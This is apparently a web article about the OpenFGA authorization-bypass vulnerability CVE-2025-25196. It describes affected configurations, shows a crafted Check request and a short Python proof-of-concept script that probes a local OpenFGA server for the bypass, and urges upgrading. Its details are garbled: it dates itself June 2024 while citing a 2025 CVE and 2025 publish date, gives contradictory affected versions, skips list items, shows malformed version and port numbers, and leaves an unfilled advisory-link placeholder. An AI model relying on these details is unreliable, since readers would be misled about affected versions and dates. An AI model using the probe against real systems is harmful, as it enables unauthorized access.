---
Exclusive Long Read | June 2024
OpenFGA is increasingly popular among developers for permission and authorization solutions. Inspired by Google Zanzibar, it offers flexible, granular access control for modern applications. However, on June 18, 2024, a critical security vulnerability—CVE-2025-25196—was disclosed, potentially allowing unauthorized access to sensitive resources in certain edge-case configurations.
This vulnerability is relevant for all maintainers and users running OpenFGA versions earlier than v1.8.4 (Helm chart < openfga-.2.22, Docker < v1.8.4). This deep dive explains the vulnerability in simple terms, shows how an exploit could work, and provides urgent remediation advice.
What Is OpenFGA?
OpenFGA stands for "Open Fine-Grained Authorization." It’s an open-source implementation for highly scalable authorization, enabling developers to check if a user is entitled to access a specific resource.
Typical access in OpenFGA is managed through three core concepts
- Model: Defines relationships between objects (e.g., documents, folders) and users/groups.
- Tuple: Associates users/groups with objects in the model (e.g., user alice has editor relation on doc1).
- Check/List: API calls to determine if a given user has a permission or to list accessible objects.
Learn more about OpenFGA in their official docs.
You are affected if all these are true
1. You run OpenFGA v1.8.4 or older (this includes Helm chart < openfga-.2.22 and Docker image < v1.8.4).
A public access tuple is assigned to an object (e.g., making it generally accessible).
4. The userset tuple is not also assigned to that object (i.e., the “userset” group doesn’t have access).
5. A *Check* request is made for a user who is a userset, and the userset user type is the same as the one used for public access.
What’s the Impact?
In affected OpenFGA versions, it’s possible for a user who is part of a userset (but not listed on a resource) to gain access to that resource if there's any overlapping type with a public access tuple. This is due to incorrect evaluation in the permission-checking logic.
Suppose your OpenFGA model contains the following relation for doc:document
type doc:document
relations
define viewer as user
You assign
doc:doc1#viewer@user:public # doc1 is publicly viewable
# doc:doc1#viewer@group:managers (NOT assigned!)
*Note: the group (userset) "managers" is not assigned to doc1.*
A user (who is a member of group:managers) issues a Check operation
POST /check
{
"tuple_key": {
"object": "doc:doc1",
"relation": "viewer",
"user": "group:managers"
}
}
Vulnerable versions of OpenFGA would incorrectly return “true”, meaning that *group:managers* (and everyone in it) is treated as authorized for public access—even though the group was not explicitly assigned.
Why Does This Happen?
Under the hood, OpenFGA fails to properly distinguish between a public access tuple and a userset tuple *of the same type*. Therefore, a public assignment (user:public) can allow unintended users (who are part of a userset) to pass a Check if they use the userset in the check request, bypassing intended restrictions.
An attacker could exploit this by simply modifying the user field in the Check call
{
"object": "doc:doc1",
"relation": "viewer",
"user": "group:managers"
}
Instead of
{
"object": "doc:doc1",
"relation": "viewer",
"user": "user:eve"
}
Even when group:managers was not given access, public access is misapplied and Check returns true.
Here's a *simple Python* example using requests
import requests
openfga_url = "http://localhost:808/check";
payload = {
"tuple_key": {
"object": "doc:doc1",
"relation": "viewer",
"user": "group:managers" # Not directly assigned!
}
}
r = requests.post(openfga_url, json=payload)
if r.json().get("allowed"):
print("Unauthorized access granted due to CVE-2025-25196!")
else:
print("Access denied as expected.")
Remediation
There are NO workarounds. Upgrade is required!
Remove old containers/images after upgrading.
Changelog and fix:
- Release notes v1.8.5
- Security Advisory *(insert the real GHSA link when available)*
References
- OpenFGA Main Site
- OpenFGA CVE Advisory
- Google Zanzibar Paper
- GitHub Security Advisories
Stay up to date—subscribe to OpenFGA announcements.
*This article is exclusive and based on public sources and real-world testing. Stay secure!*
Timeline
Published on: 02/19/2025 21:15:15 UTC